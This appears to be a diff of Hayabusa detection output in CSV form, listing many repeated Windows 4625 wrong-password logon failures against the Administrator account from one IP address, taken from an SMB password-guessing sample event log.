+2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I41H8U06uuGlMf9S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r6Eh55149gbuU2el  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ajzJabQi7CjosFQ1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l9y7gyU9aJi6Fpm3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hbLiIVcBYlu5JkX2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bDfEfHk54J3lJI6m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WOpuMTECalyeObl7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nZQYU1dyQOqlNJDL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pc58gDT07WNH3mMz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EhExnDfInKbEI6AO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qKKTTQ0ZT2Ye4TV9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LdBFYyftnH67Gyh5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eO6c2PDl7zVBGzPi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1ONnDOs16EnBkdFv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aTHHCX9EoKRY4zhR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f1jhH08oLzpONDpa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o2YK7zc7Ne9c8txA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 86CrOo9CFreIzSM5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0X9UEojEnc350xPc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9g3PO3jofnySl92G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5TRndfQmPYuhV0Ri  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yyJOdaks4B1sKMDv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IB3OSmcFx5TUiiJX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lo3Ex40dkIeO53HF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AkzDG8QOM2cxbokF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YoMf36ZXJBLnYxtc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5izPIefHqDDWNDlu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: z9o4f1XvvcVXBNwL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IjCR48ZJFyEhzrYI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mUV9i4O2gapcC01d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XJzGAMQCvJBFOUPq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fyyu0x6I29R2J10Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8lCe1shqSs0xNwAJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ipZAMvm56d5mE9Fc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XX9N7jodTuEYBCSE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h5DBFGpzfJJ7gYV1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fQ3qTwcWkXJDuXDI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TOfkvLSo2HuhMtvk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y9DQUhPQHvvwAO0C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yao1JM0tSFv5IHnL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NXGm63wiZz3ZYFb9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: izvPgZCO2GRVLhId  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iI9zO2o7jd922pfK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UnAGy86My6hVwt4J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HhFTzONSVEziRtgq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QdEv4ooC8AApqU1T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TxFGRBKVK732Aeu4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ITg8QH90LKkAQMLL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E8YKCN2uxmJtYxdW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lcVIqrTQbNLFW7Cr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: taZx68l1ci0i2XB0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Jjy0gZhZCc9dVGd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S1DxOWcNytmxHfxl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JGRFWos3MJeQ0oAr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I3YXVTiQAGbf57TH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eWNsBwoGd36krY2U  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HIobpWCoOHdD76lL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W91ruUEdXwRcMxVB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6PEs7fp97cYFf4vx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hQelUX0kwLfpJnr0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t88CBspQqbiO1IPc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zELW2Upo3jRCIqJk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QfcyJGLYmu93JBIL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3t2nKPZHZvcXM3QA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oiDRonqdEM2YJvz9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wJPF4GUypkDkTz56  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cd5YRVIoXx8LoYpK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H49I2Xp2Gz1Jj0Wh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZMSWWzskoRfYBGny  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GLm2PolKMBsYkPnN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2ZjHWhG2rXzYWskz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FOZzVedHYODB5Yvd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
